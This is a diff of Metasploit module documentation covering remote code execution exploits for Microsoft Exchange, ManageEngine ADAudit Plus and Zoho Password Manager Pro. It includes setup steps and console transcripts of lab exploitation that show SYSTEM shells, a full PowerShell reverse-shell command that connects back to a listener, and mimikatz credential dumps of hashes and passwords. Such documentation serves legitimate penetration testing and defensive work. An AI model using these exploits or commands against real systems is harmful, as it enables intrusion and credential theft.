-[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7x
-[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Without a database connected that payload UUID tracking will not work!
-[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Staging x64 payload (201308 bytes) ...
-[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Without a database connected that payload UUID tracking will not work!
-[*] Meterpreter session 3 opened (172.31.171.42:4444 -> 127.0.0.1 ) at 2022-02-14 18:03:03 -0600
-
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > load kiwi
-Loading extension kiwi...
-  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
- '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
-  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
-
-Success.
-meterpreter > creds_all
-[+] Running as SYSTEM
-[*] Retrieving all credentials
-msv credentials
-===============
-
-Username          Domain         NTLM               SHA1               DPAPI
--------          ------         ----               ----               -----
-Administrator     TESTINGDOMAIN  373b765d01cd8aefe  220cface685ef2b97  c5c54fb2b86a1a4a85
-                                 a318e3843980454    a998f965b0d9b996b  e6b23ad360777e
-                                                    55d560
-DC1$              TESTINGDOMAIN  bc7047881521a2844  1489def7ac6e5dd8e
-                                 573cd9b08cb33ed    ebf9d421549375da8
-                                                    9bef2d
-HealthMailbox25a  TESTINGDOMAIN  c9cd8580d9a519f7d  f5a89bd625da37ca3  c0f96c3c13864ffe1f
-d078                             3fe3b47e4e55f21    e9de89be8bba67e1b  6b62f2d0811bb1
-                                                    7d509b
-
-ssp credentials
-===============
-
-Username                      Domain  Password
--------                      ------  --------
-HealthMailbox25ad0782aada405  (null)  5sYVnq4G=D1UacRrD(I-.hf&wQRe4DN_xn8I=G#JrD?B)-MWU$f
-eaaa7287c8c514daf@testingdom          >)Ojhaah_2a]9cuP)&YR_)71BnJ=@Tdhw8C^{RJ[(^Z;Z-X}F9o
-ain.internal                          OeVGtzP=qPZ@9xT-uR)niraV42
-
-wdigest credentials
-===================
-
-Username              Domain         Password
--------              ------         --------
-(null)                (null)         (null)
-Administrator         TESTINGDOMAIN  (null)
-DC1$                  TESTINGDOMAIN  (null)
-HealthMailbox25ad078  TESTINGDOMAIN  (null)
-
-kerberos credentials
-====================
-
-Username              Domain                  Password
--------              ------                  --------
-(null)                (null)                  (null)
-Administrator         TESTINGDOMAIN.INTERNAL  (null)
-DC1$                  testingdomain.internal  4d ce f7 a8 f4 e9 57 3e f2 7d fa 08 fd 44 7
-                                              2 d1 9d d2 7b ce 0c fd 86 cb 7c 6c a8 26 50
-                                               ea 21 c6 f2 b1 63 a8 67 ab 2f ac d8 0e b0
-                                              33 02 b1 6c f6 4f f6 3d 9d f1 55 e3 ee ef 0
-                                              8 d3 a9 96 e0 e4 d2 a2 1f 50 b0 8d 70 00 e6
-                                               88 1b a4 63 27 bf ed 60 3e 57 12 b2 25 ec
-                                              b7 52 4f 01 e7 3c 93 0a ea 48 e5 2c 6d 18 7
-                                              3 80 c3 5f 2e cd 81 93 4e 81 52 32 e2 49 8e
-                                               61 63 ac 5e 72 59 f3 40 d5 be 2a cd ba a2
-                                              e4 f7 08 a6 af 1c 10 4f 79 4c 62 60 84 ad 6
-                                              6 9f 29 ae 03 2c b0 83 44 be 4b e8 64 1d 29
-                                               9b 8f 77 2c 92 5c 80 ca 93 d6 7c fe 1f 6b
-                                              f6 48 52 22 62 14 ba ea 4b 7a 2b 69 98 60 4
-                                              6 43 8e 1f 22 87 a8 57 35 06 9e 6e 83 f1 9e
-                                               25 01 34 55 eb 93 a8 f9 65 ab 56 9e 7b b8
-                                              83 86 63 b4 e2 0a e9 a7 cb a0 34 89 35 72 a
-                                              a 3b f2 df ea c1 f6 77 a6 bb cb
-HealthMailbox25ad078  TESTINGDOMAIN.INTERNAL  (null)
-dc1$                  TESTINGDOMAIN.INTERNAL  (null)
-
-
-meterpreter >
-```
@@ -0,0 +1,317 @@
+## Vulnerable Application
+
+### Description
+This module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10,
+Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22 all prior to Mar22SU.
+
+Note that authentication is required to exploit these vulnerabilities.
+
+By leveraging this vulnerability, attackers can bypass the `ChainedSerializationBinder`'s deserialization deny list and
+execute code as `NT AUTHORITY\SYSTEM`.
+
+#### CVE-2021-42321 (Deny List Typo)
+This specific flaw exists due to the fact that the deny list for the ChainedSerializationBinder had a typo whereby an
+entry was incorrectly defined as `System.Security.ClaimsPrincipal` instead of the proper value of
+`System.Security.Claims.ClaimsPrincipal`.
+
+Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019, and Exchange Server 2016 CU22 SU0 on Windows Server
+2016.
+
+#### CVE-2022-23277 (Type Spoof Bypass)
+Due to `ChainedSerializationBinder.BindToType(string, string)` and `ObjectReader.FastBindToType(string, string)` using 
+different algorithms, it is possible to bypass validation checks and load a malicious object.
+
+Tested against Exchange Server 2019 CU11 SU3, build 15.2.986.15 via [KB5008631].
+### Setup
+
+1. Set up a version of Windows Server 2019.
+2. Download Exchange Server 2019 CU11 SU0 from https://download.microsoft.com/download/5/3/e/53e75dbd-ca33-496a-bd23-1d861feaa02a/ExchangeServer2019-x64-CU11.ISO
+3. Follow the guide at https://petri.com/how-to-install-active-directory-in-windows-server-2019-server-manager to turn
+the server into an AD server.
+4. Mount the ISO and run `Setup.exe`. It should prompt you install .NET Framework, Visual Studio C++ Redistributables,
+and Unified Communications Managed API. Install these and then reboot.
+5. Follow https://www.nucleustechnologies.com/blog/step-by-step-guide-to-install-exchange-server-2019-part-1/ and
+install the required features.
+6. Keep running `Setup.exe` and installing extra dependencies as needed as per the links.
+7. When you do get all dependencies installed, Exchange should give a button called `Install` which should no longer be
+greyed out. Press this to install and accept any warnings that appear.
+8. Go to https://*ip here*/owa/ and make sure you can see the Exchange Outlook login page.
+
+## Verification Steps
+
+1. Follow [Setup](#setup) to set up a vulnerable target.
+2. `msfconsole`
+3. `set RHOST <target IP address>`
+4. `set LHOST <IP for target to connect back to>`
+5. `set HttpUsername <username of OWA user to log in as>`
+6. `set HttpPassword <password for this OWA user>`
+7. Optional: `set DOMAIN <domain of OWA user>`
+8. Optional: `set VHOST <vhost of target>`
+9. `exploit`
+10. You should get a shell on the target as `NT AUTHORITY\SYSTEM` if it is vulnerable.
+
+## Targets
+
+### 0
+
+Windows Command
+
+### 1
+
+Windows Dropper
+
+### 2
+
+PowerShell Stager
+
+## Options
+
+### HttpUsername
+
+Set this to the OWA username. This can also be set to a valid domain username that has permissions to log into Exchange.
+
+### HttpPassword
+
+Set this to the OWA password. This can also be set to the password for a domain user that has permissions to log into Exchange.
+
+## Scenarios
+
+### Exchange Server 2016 CU22 (Build 15.1.2375.7) on Windows Server 2016 x64 (CVE-2021-42321)
+
+```
+msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce 
+[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpUsername aliddle
+HttpUsername => aliddle
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpPassword Password1
+HttpPassword => Password1
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN EXCHG
+DOMAIN => EXCHG
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOSTS 192.168.159.42
+RHOSTS => 192.168.159.42
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options 
+
+Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  Password1        yes       The password to use to authenticate to the Exchange server
+   HttpUsername  aliddle          yes       The username to log into the Exchange server as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.159.42   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         443              yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI     /                yes       Base path
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Target is an Exchange Server!
+[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is vulnerable to CVE-2021-42321
+[*] Getting the user's inbox folder's ID and ChangeKey ID...
+[+] ChangeKey value for Inbox folder is AQAAABYAAAD9j/m9iNuTRpA5mrD5EV0AAAAACmbL
+[+] ID value for Inbox folder is AQMkADU1ADBhYjYzMi02MTQ3LTRlOTEtYjU1ADAtN2M0ZDBhYjYzODVlAC4AAAMhko4gUQEoR6mlLklj/zwrAQD9j/m9iNuTRpA5mrD5EV0AAAMBDAAAAA==
+[*] Deleting the user configuration object associated with Inbox folder...
+[!] Was not able to successfully delete the existing user configuration on the Inbox folder!
+[!] Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!
+[*] Creating the malicious user configuration object on the Inbox folder!
+[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
+[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
+[*] Sending stage (175686 bytes) to 192.168.250.237
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:60610) at 2022-08-16 15:56:01 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-BPID95ACQ7E
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : EXCHG
+Logged On Users : 4
+Meterpreter     : x86/windows
+meterpreter >
+```
+
+### Exchange Server 2016 CU22 Jan22SU (Build 15.1.2375.18) on Windows Server 2016 x64 (CVE-2022-23277)
+
+```
+msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce 
+[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpUsername aliddle
+HttpUsername => aliddle
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpPassword Password1
+HttpPassword => Password1
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN EXCHG
+DOMAIN => EXCHG
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOSTS 192.168.159.42
+RHOSTS => 192.168.159.42
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options 
+
+Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  Password1        yes       The password to use to authenticate to the Exchange server
+   HttpUsername  aliddle          yes       The username to log into the Exchange server as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.159.42   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         443              yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI     /                yes       Base path
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Target is an Exchange Server!
+[+] The target appears to be vulnerable. Exchange Server 15.1.2375.18 is vulnerable to CVE-2022-23277
+[*] Getting the user's inbox folder's ID and ChangeKey ID...
+[+] ChangeKey value for Inbox folder is AQAAABYAAAD9j/m9iNuTRpA5mrD5EV0AAAB3/PSE
+[+] ID value for Inbox folder is AQMkADU1ADBhYjYzMi02MTQ3LTRlOTEtYjU1ADAtN2M0ZDBhYjYzODVlAC4AAAMhko4gUQEoR6mlLklj/zwrAQD9j/m9iNuTRpA5mrD5EV0AAAMBDAAAAA==
+[*] Deleting the user configuration object associated with Inbox folder...
+[+] Successfully deleted the user configuration object associated with the Inbox folder!
+[*] Creating the malicious user configuration object on the Inbox folder!
+[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
+[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
+[*] Sending stage (175686 bytes) to 192.168.250.237
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:59440) at 2022-08-16 15:47:55 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-BPID95ACQ7E
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : EXCHG
+Logged On Users : 7
+Meterpreter     : x86/windows
+meterpreter >
+```
+
+### Exchange Server 2019 CU11 Jan22SU (Build 15.2.986.15) on Windows Server 2019 x64 (CVE-2022-23277)
+
+```
+msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce 
+[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOSTS 192.168.159.11
+RHOSTS => 192.168.159.11
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpUsername aliddle
+HttpUsername => aliddle
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpPassword Password1!
+HttpPassword => Password1!
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN MSFLAB.LOCAL
+DOMAIN => MSFLAB.LOCAL
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options 
+
+Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  Password1!       yes       The password to use to authenticate to the Exchange server
+   HttpUsername  aliddle          yes       The username to log into the Exchange server as
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.159.11   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         443              yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI     /                yes       Base path
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Target is an Exchange Server!
+[+] The target appears to be vulnerable. Exchange Server 15.2.986.15 is vulnerable to CVE-2022-23277
+[*] Getting the user's inbox folder's ID and ChangeKey ID...
+[+] ChangeKey value for Inbox folder is AQAAABYAAACLmD9luiUIToCqtjHJMHTFAAADDlsC
+[+] ID value for Inbox folder is AQMkAGMzMmEwZDQyLTJmMmYtNDdlNi04Nzg0LTNiMmNmMTkwZmNjAGIALgAAAwy2SlsLo7NNtRvmAZGoLDABAIuYP2W6JQhOgKq2MckwdMUAAAIBDAAAAA==
+[*] Deleting the user configuration object associated with Inbox folder...
+[+] Successfully deleted the user configuration object associated with the Inbox folder!
+[*] Creating the malicious user configuration object on the Inbox folder!
+[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
+[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
+[*] Sending stage (175686 bytes) to 192.168.250.237
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:63854) at 2022-08-16 15:49:45 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : EXCHANGE2019
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x86/windows
+meterpreter > 
+```
+
+[KB5008631]: https://support.microsoft.com/en-gb/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-january-11-2022-kb5008631-2ee4d1f3-8341-4a4d-86be-4b73bc944f1b
@@ -0,0 +1,70 @@
+## Vulnerable Application
+
+The vulnerable application is ManageEngine ADAudit Plus prior to build 7060. I built and tested this on build 7055, which, at least at the time of this writing, you can download [here](https://archives2.manageengine.com/active-directory-audit/). It's a .exe file that you can install with all the defaults.
+
+You also need to configure ADAudit to actually audit a domain. That means setting up a domain (I created a domain controller in the lab), and configuring ADAudit to scan that domain. That domain name must be set to the `DOMAIN` when using this exploit.
+
+The last thing is, three connect-back ports must be open from the target back to Metasploit (in addition to whatever payload ports). By default, we use ports 8080 and 8888 for HTTP, and 2121 for FTP.
+
+## Verification Steps
+
+1. Install the application
+2. Do: `set RHOSTS <IP>`
+3. Do: `set DOMAIN <DOMAIN_NAME>`
+4. Do: `exploit`
+5. You should get a meterpreter session
+
+## Scenarios
+
+```
+msf6 > use exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
+[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
+msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set RHOSTS 10.0.0.148
+RHOSTS => 10.0.0.148
+msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > set DOMAIN ad.example.local
+DOMAIN => ad.example.local
+msf6 exploit(windows/http/manageengine_adaudit_plus_cve_2022_28219) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. The vulnerable endpoint responds with HTTP/200.
+[*] Attempting to exploit XXE to get a list of users
+[*] Using URL: http://10.0.0.146:8080/KEmvnPFxS.dtd
+[*] User accounts discovered: Ron
+[*] Enumerating old payloads cached on the server (to skip later)
+[*] Using URL: http://10.0.0.146:8080/NvkXTJXRyhV.dtd
+[*] Attempting to exploit XXE to store our serialized payload on the server
+[*] Trying to find our payload in all users' temp folders
+[*] Using URL: http://10.0.0.146:8080/ppVHiihu.dtd
+[*] Executing payload: /users/Ron/appdata/local/temp/jar_cache4413164256015023251.tmp...
+[*] Sending stage (175686 bytes) to 10.0.0.148
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.148:52347) at 2022-07-07 15:19:59 -0700
+
+meterpreter >
+```
+
+## Options
+
+### TARGETURI_DESERIALIZATION / TARGETURI_XXE
+
+The target URLs - probably won't ever need to be changed
+
+### DOMAIN
+
+A domain that the target monitors. We cannot validate this, but if the exploit should work and doesn't, this might be the issue.
+
+### SRVPORT / SRVPORT_FTP / SRVPORT_HTTP2
+
+The connect-back ports.
+
+* `SRVPORT` is used to host XXE payloads
+* `SRVPORT_HTTP2` is used for an XXE payload that is held open, creating a temporary file on the server
+* `SRVPORT_FTP` is used for a fake off-spec FTP server that receives a directory listing also via XXE
+
+# PATH_TRAVERSAL_DEPTH
+
+The number of `../` to add to the request
+
+# FtpCallbackTimeout / HttpUploadTimeout
+
+How long to wait for FTP or HTTP responses before giving up
@@ -1,6 +1,6 @@
 ## Description
 This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet.
-Additional information can be viewed on https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html
+Additional information can be viewed on https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/

 ## Verification Steps
 [Exchange Reporter Plus 5216](https://mega.nz/#!XG5CTC5I!IuG91CbrcdcpQj4teYRiBWNwy9pULRkV69U3DQ6nCyU)
@@ -0,0 +1,185 @@
+## Vulnerable Application
+This module exploits a unauthenticated deserialization vulnerability in the XML RPC interface exposed by Zoho
+ManageEngine Password Manager Pro before 12101 and PAM360 before 5510. Note that ManageEngine Access Manager Plus
+before 4303 is also affected provided one provides credentials, however this is not targeted by this exploit.
+
+Successful exploitation results in unauthenticated RCE as the `NT AUTHORITY\SYSTEM` user.
+
+### Installation
+Vulnerable software for testing can be downloaded [here](https://archives2.manageengine.com/passwordmanagerpro/12100/ManageEngine_PMP_64bit.exe).
+The patch can be downloaded from [here](https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm)
+
+When installing the software follow the defaults. You can skip the registration however or any parts where you need
+to fill in additional details to continue (these should have a `Skip` button so you can skip them).
+
+## Verification Steps
+1. Follow the installation instructions above.
+2. Start msfconsole
+3. Do: `use exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce`
+4. Do: `set RHOSTS [IP]`
+7. Do: `set payload [payload]`
+8. Do: `set LHOST [IP]`
+9. Optional: `set LPORT [local port to listen on]`
+10. Do: `exploit`
+
+## Options
+
+## Targets
+```
+Id  Name
+--  ----
+0   Windows EXE Dropper
+1   Windows Command
+2   Windows Powershell
+```
+
+## Scenarios
+### ManageEngine Password Manager Pro 12100 Running on Windows 11
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
+[*] Using configured payload cmd/windows/reverse_powershell
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set RHOSTS 172.17.245.94
+RHOSTS => 172.17.245.94
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set LHOST 172.17.255.112 
+LHOST => 172.17.255.112
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > set LPORT 8899
+LPORT => 8899
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > show options
+
+Module options (exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.17.245.94    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metas
+                                         ploit
+   RPORT      7272             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local
+                                         machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/windows/reverse_powershell):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.17.255.112   yes       The listen address (an interface may be specified)
+   LPORT  8899             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows Command
+
+
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > exploit
+
+[*] Started reverse TCP handler on 172.17.255.112:8899 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Target can deserialize arbitrary data.
+[*] Executing Windows Command for cmd/windows/reverse_powershell
+[+] Successfully executed command: powershell -w hidden -nop -c $a='172.17.255.112';$b=8899;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) {    start-sleep -m 100;    if ($osread.IsCompleted -and $osread.Result -ne 0) {      $r=$os.BaseStream.EndRead($osread);      $s.Write($ob,0,$r);      $s.Flush();      $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);    }    if ($esread.IsCompleted -and $esread.Result -ne 0) {      $r=$es.BaseStream.EndRead($esread);      $s.Write($eb,0,$r);      $s.Flush();      $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);    }    if ($s.DataAvailable) {      $r=$s.Read($nb,0,$nb.Length);      if ($r -lt 1) {          break;      } else {          $str=$e.GetString($nb,0,$r);          $is.write($str);      }    }    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {        break;    }    if ($p.ExitCode -ne $null) {        break;    }}
+[*] Command shell session 1 opened (172.17.255.112:8899 -> 172.17.245.94:56612) at 2022-08-02 11:37:28 -0500
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.22000.795]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Program Files\ManageEngine\PMP\bin>
+-----
+          
+
+C:\Program Files\ManageEngine\PMP\bin>whoami
+whoami
+nt authority\system
+
+C:\Program Files\ManageEngine\PMP\bin>background
+
+Background session 1? [y/N]  y   
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type               Information                                      Connection
+  --  ----  ----               -----------                                      ----------
+  1         shell cmd/windows  Shell Banner: Microsoft Windows [Version 10.0.2  172.17.255.112:8899 -> 172.17.245.94:56612 (172.
+                               2000.795] (c) Microsoft Corpo...                 17.245.94)
+
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions -u 1
+[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
+
+[*] Upgrading session ID: 1
+[*] Starting exploit/multi/handler
+[*] Started reverse TCP handler on 172.17.255.112:4433 
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > 
+[*] Sending stage (200774 bytes) to 172.17.245.94
+[*] Meterpreter session 2 opened (172.17.255.112:4433 -> 172.17.245.94:56631) at 2022-08-02 11:38:11 -0500
+[*] Stopping exploit/multi/handler
+
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                   Connection
+  --  ----  ----                     -----------                                   ----------
+  1         shell cmd/windows        Shell Banner: Microsoft Windows [Version 10.  172.17.255.112:8899 -> 172.17.245.94:56612 (1
+                                     0.22000.795] (c) Microsoft Corpo...           72.17.245.94)
+  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN11-TEST              172.17.255.112:4433 -> 172.17.245.94:56631 (1
+                                                                                   72.17.245.94)
+
+msf6 exploit(windows/http/zoho_password_manager_pro_xml_rpc_rce) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > load kiwi
+Loading extension kiwi...
